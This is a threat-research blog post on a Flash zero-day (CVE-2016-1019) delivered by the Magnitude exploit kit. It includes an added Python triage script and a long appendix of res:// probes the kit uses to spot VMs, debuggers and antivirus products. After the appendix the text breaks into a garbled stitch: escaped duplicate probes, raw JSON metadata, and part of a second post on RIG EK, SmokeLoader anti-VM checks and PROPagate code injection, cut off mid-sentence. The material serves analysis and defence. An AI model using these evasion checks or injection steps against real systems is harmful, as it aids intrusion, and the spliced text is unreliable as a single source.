On April 2, security researcher @Kafeine at Proofpoint [discovered a change to the Magnitude Exploit Kit](<https://www.proofpoint.com/us/threat-insight/post/killing-zero-day-in-the-egg>). Thanks to their collaboration, we analyzed the sample and discovered that Magnitude EK was exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-1019). The in-the-wild exploit achieves remote code execution on recent versions of Flash Player, but fails on the latest version (21.0.0.197).
While version 21.0.0.197 is vulnerable to this exploit, execution fails because Adobe introduced new exploit mitigations in version 21.0.0.182 of Flash Player. This was a great move from Adobe that shows how valuable innovation in exploit mitigations can be. Before the exploit kit authors could devise a way around the new mitigations, Adobe patched the underlying vulnerability.
##### Exploit Delivery Chain
Magnitude EK recently updated its delivery chain. It added a profile gate, just like Angler EK, which collects the screen’s dimensions and color depth (Figure 1).

Figure 1. JS of Profile Gate
The server responds with another profiling page, which tries to avoid sending exploits to users browsing from virtual machines or with certain antivirus programs installed (Figure 2). See the appendix for the full list of checks performed.

Figure 2. JS of redirecting to main exploit page
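As an added triage example (not code from the original post), the helper below flags the two behaviours described above in a captured script: a profile gate that reads screen dimensions and colour depth, and `res://` probes for VM tools and security products, using the vendor names from the appendix; `SAMPLE_JS` is a constructed stand-in for the profiling page.

```python
"""Triage helper: flag exploit-kit style profiling in a captured JavaScript sample."""
import json
import re
from urllib.parse import unquote

# Vendor substrings (lower-case) taken from the post's appendix, mapped to a
# coarse category a triage analyst cares about.
CATEGORIES = {
    "vmware": "virtualization",
    "virtualbox": "virtualization",
    "parallels": "virtualization",
    "fiddler": "debugging proxy",
    "malwarebytes": "security product",
    "trend micro": "security product",
    "kaspersky": "security product",
}

# Win32 resource types used by the probes in the appendix: #2 is RT_BITMAP, #3 is RT_ICON.
RESOURCE_TYPES = {2: "RT_BITMAP", 3: "RT_ICON"}

# A res:// URI inside a JS/HTML string literal. Paths may contain spaces
# ("VMware Tools"), so match up to the closing quote, not to whitespace.
RES_LITERAL = re.compile(r"""["']res://([^"']+)["']""", re.I)

# Property reads that make up the profile gate (Figure 1 of the post).
SCREEN_FIELD = re.compile(
    r"\bscreen\.(width|height|colorDepth|pixelDepth|availWidth|availHeight)\b"
)

# Constructed sample: a profile gate plus four probes shaped like the appendix entries.
SAMPLE_JS = r'''
var w = screen.width, h = screen.height, d = screen.colorDepth;
var probes = [
  "res://\\Program%20Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567",
  "res://\\Program%20Files%20(x86)\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110",
  "res://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200",
  "res://\\Program%20Files%20(x86)\\Fiddler2\\Fiddler.exe/#3/#32512"
];
'''


def parse_res_probe(body):
    """Split '\\Program%20Files\\Vendor\\tool.exe/#2/#110' into path, type and id."""
    body = body.replace("\\\\", "\\")  # JS literals escape backslashes; collapse them
    parts = body.split("/")
    if len(parts) != 3:
        return None  # not the <path>/<type>/<id> shape the kit uses
    path = unquote(parts[0]).lstrip("\\")
    type_str = parts[1].lstrip("#")
    res_type = RESOURCE_TYPES.get(int(type_str), f"#{type_str}") if type_str.isdigit() else parts[1]
    lower = path.lower()
    category = next((cat for key, cat in CATEGORIES.items() if key in lower), "unknown")
    return {
        "path": path,
        "category": category,
        "resource_type": res_type,
        "resource_id": parts[2].lstrip("#"),
    }


def extract_res_probes(js):
    """Every well-formed res:// probe found in the script, in order of appearance."""
    probes = []
    for m in RES_LITERAL.finditer(js):
        parsed = parse_res_probe(m.group(1))
        if parsed:
            probes.append(parsed)
    return probes


def screen_profiling_fields(js):
    """Sorted, de-duplicated screen.* properties the script reads."""
    return sorted(set(SCREEN_FIELD.findall(js)))


def assess(js):
    """Combine both signals into a verdict: suspicious, review, or clean."""
    probes = extract_res_probes(js)
    fields = screen_profiling_fields(js)
    categories = sorted({p["category"] for p in probes})
    if probes and fields:
        verdict = "suspicious"  # profile gate plus environment probes, the Magnitude pattern
    elif probes or len(fields) >= 3:
        verdict = "review"      # one signal alone also occurs in benign analytics code
    else:
        verdict = "clean"
    return {"verdict": verdict, "probes": probes, "categories": categories, "screen_fields": fields}


if __name__ == "__main__":
    print(json.dumps(assess(SAMPLE_JS), indent=2))
```

Run it against a script captured by a proxy or sandbox; a "suspicious" verdict with virtualization and security-product categories together is the combination worth escalating.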
In our tests, Magnitude EK delivered the JSON double free exploit (CVE-2015-2419) and a small Flash loader that renders the new Flash exploit (Figure 3).

Figure 3. JS of loading exploits
##### The Flash Exploit
A memory corruption vulnerability exists in an undocumented ASnative API. The exploit causes the Flash memory allocator to allocate buffers under the attacker’s control. The attacker can then create a ByteArray of length 0xFFFFFFFF such that it can read and write arbitrary memory, as seen in Figure 4. The exploit’s code layout and some of its functionality are similar to the leaked HackingTeam exploits, in that it downloads malware from another server and executes it.

Figure 4. ActionScript of Flash exploits
##### Conclusion
This is not the first time that new exploit mitigation research has rendered an in-the-wild zero-day exploit ineffective. Exploit mitigations are an invaluable tool for the industry, and their ongoing development within some of the most widely targeted applications – such as Internet Explorer/Edge and Flash Player – changes the game.
Despite regular security updates, attackers continue to target Flash Player, primarily because of its ubiquity and cross-platform reach. If Flash Player is required in your environment, ensure that you update to the latest version, and consider the use of mitigation tools such as [EMET](<https://support.microsoft.com/en-us/kb/2458544>) from Microsoft.
Click [here](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) for the security bulletin issued by Adobe.
##### Acknowledgements
A huge thank you to @Kafeine, without whom this discovery would not be possible. His diligence continues to keep this industry at pace with exploit kit authors around the world.
##### Appendix
res://\Program%20Files%20(x86)\Fiddler2\Fiddler.exe/#3/#32512
res://\Program%20Files\Fiddler2\Fiddler.exe/#3/#32512
res://\Program%20Files%20(x86)\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#26567
res://\Program%20Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#26567
res://\Program%20Files%20(x86)\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#30996
res://\Program%20Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#30996
res://\Program%20Files%20(x86)\Oracle\VirtualBox Guest Additions\uninst.exe/#2/#110
res://\Program%20Files\Oracle\VirtualBox Guest Additions\uninst.exe/#2/#110
res://\Program%20Files%20(x86)\Parallels\Parallels Tools\Applications\setup_nativelook.exe/#2/#204
res://\Program%20Files\Parallels\Parallels Tools\Applications\setup_nativelook.exe/#2/#204
res://\Program%20Files%20(x86)\Malwarebytes Anti-Malware\mbamext.dll/#2/202
res://\Program%20Files\Malwarebytes Anti-Malware\mbamext.dll/#2/202
res://\Program%20Files%20(x86)\Malwarebytes Anti-Malware\unins000.exe/#2/DISKIMAGE
res://\Program%20Files\Malwarebytes Anti-Malware\unins000.exe/#2/DISKIMAGE
res://\Program%20Files%20(x86)\Malwarebytes Anti-Exploit\mbae.exe/#2/200
res://\Program%20Files\Malwarebytes Anti-Exploit\mbae.exe/#2/200
res://\Program%20Files%20(x86)\Malwarebytes Anti-Exploit\mbae.exe/#2/201
res://\Program%20Files\Malwarebytes Anti-Exploit\mbae.exe/#2/201
res://\Program%20Files%20(x86)\Malwarebytes Anti-Exploit\unins000.exe/#2/DISKIMAGE
res://\Program%20Files\Malwarebytes Anti-Exploit\unins000.exe/#2/DISKIMAGE
res://\Program%20Files%20(x86)\Trend Micro\Titanium\TmConfig.dll/#2/#30994
res://\Program%20Files\Trend Micro\Titanium\TmConfig.dll/#2/#30994
res://\Program%20Files%20(x86)\Trend Micro\Titanium\TmSystemChecking.dll/#2/#30994
res://\Program%20Files\Trend Micro\Titanium\TmSystemChecking.dll/#2/#30994
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 6.0 for Windows Workstations\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0 for Windows Workstations\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 7.0\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2009\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2009\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2010\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2010\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2011\avzkrnl.dll/#2/BBALL
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\avzkrnl.dll/#2/BBALL
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2012\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2012\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 6.0\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 6.0\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 7.0\shellex.dll/#2/#102
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 7.0\shellex.dll/#2/#102
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2009\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2009\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2010\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2010\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2011\avzkrnl.dll/#2/BBALL
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2011\avzkrnl.dll/#2/BBALL
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2012\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2012\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Internet Security 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 14.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.1\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 15.0.2\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky Total Security 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky Total Security 16.0.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky CRYSTAL 3.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky CRYSTAL 3.0\x86\mfc42.dll/#2/#26567
res://\Program%20Files%20(x86)\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
res://\Program%20Files\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky 
Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 
\nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T12:30:00", "type": "fireeye", "title": "CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419", "CVE-2016-1019"], "modified": "2016-04-07T12:30:00", "id": "FIREEYE:DE62068C8D7AE6B9EE810D02BC01433E", "href": "https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T16:34:44", "description": "#### Introduction\n\nThrough FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the [PROPagate injection technique](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject code that downloads and executes a Monero miner (similar activity has been reported by [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/>)). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.\n\n#### Attack Chain\n\nThe attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.\n\n \nFigure 1: Attack chain flow chart\n\n#### Exploit Kit Analysis\n\nWhen the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.\n\n \nFigure 2: Injected iframe\n\nThe landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. 
None of these techniques is new, so we will only give a brief overview of each in this post.\n\n#### JavaScript 1\n\nThe first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.\n\n \nFigure 3: JavaScript 1 code snippet\n\nThe VBScript exploits [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>), which allows it to download the payload and execute it using the code snippet seen in Figure 4.\n\n \nFigure 4: VBScript code snippet\n\n#### JavaScript 2\n\nThe second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.\n\n \nFigure 5: JavaScript 2 code snippet\n\nThis newly appended JavaScript exploits [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>), which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.\n\n \nFigure 6: Obfuscation using variables\n\nUsing these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419, which in turn will cause native code execution, as shown in Figure 7.\n\n \nFigure 7: Call to JSON.stringify\n\n#### JavaScript 3\n\nThe third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. 
This additional JavaScript adds a flash object that exploits [CVE-2018-4878](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>), as shown in Figure 8.\n\n \nFigure 8: JavaScript 3 code snippet\n\nOnce the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.\n\n \nFigure 9: WScript command line\n\nThis JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.\n\n \nFigure 10: Malicious command line\n\n#### Payload Analysis\n\nFor this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.\n\n \nFigure 11: Malware activity flow chart\n\n#### Analysis of NSIS Loader (SmokeLoader)\n\nThe first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named \u2018kumar.dll\u2019 and \u2018abaram.dat\u2019 in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).\n\nThe DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.\n\n#### Analysis of Injected Code (Second Stage Payload)\n\nThe second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.\n\nAt the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. 
It also contains code that checks whether the executable is being debugged, which it extracts from offset 0x2 of the PEB. If the _BeingDebugged_ flag is set, the executable terminates itself.\n\nThe malware also implements an Anti-VM check by opening the registry key **HKLM\\SYSTEM\\ControlSet001\\Services\\Disk\\Enum** with value 0.\n\nIt checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen. Each of these strings is indicative of virtual machines.\n\nAfter running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.\n\nThe malware uses the [PROPagate injection method](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.\n\nThis code injection technique only works for a process with a lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.\n\n \nFigure 12: Checking integrity level of current process\n\nIf the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.\n\nThe malware creates a file mapping object and writes the dropper file path to it; the same mapping object is accessed by the injected code to read the dropper file path and delete the dropper file. 
The name of the mapping object is derived from the volume serial number of the system drive and an XOR operation with a hardcoded value (Figure 13).\n\n_File Mapping Object Name = \u201cVolume Serial Number\u201d + \u201cVolume Serial Number\u201d XOR 0x7E766791_\n\n \nFigure 13: Creating file mapping object name\n\nThe malware then decrypts the third stage payload using XOR and decompresses it with RtlDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of the decrypted data, we can get the proper executable header (Figure 14).\n\n \nFigure 14: Injected executable without header (left), and with header (right)\n\nAfter decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses the GetShellWindow and GetWindowThreadProcessId APIs to get the shell window\u2019s thread ID (Figure 15).\n\n \nFigure 15: Getting shell window thread ID\n\nThe malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.\n\nAfter injecting the payload into the target process, it uses the EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares each with UxSubclassInfo.\n\nAfter finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.\n\nSetPropA has three arguments, the third of which is data. The callback procedure address is stored at offset 0x14 from the beginning of data. 
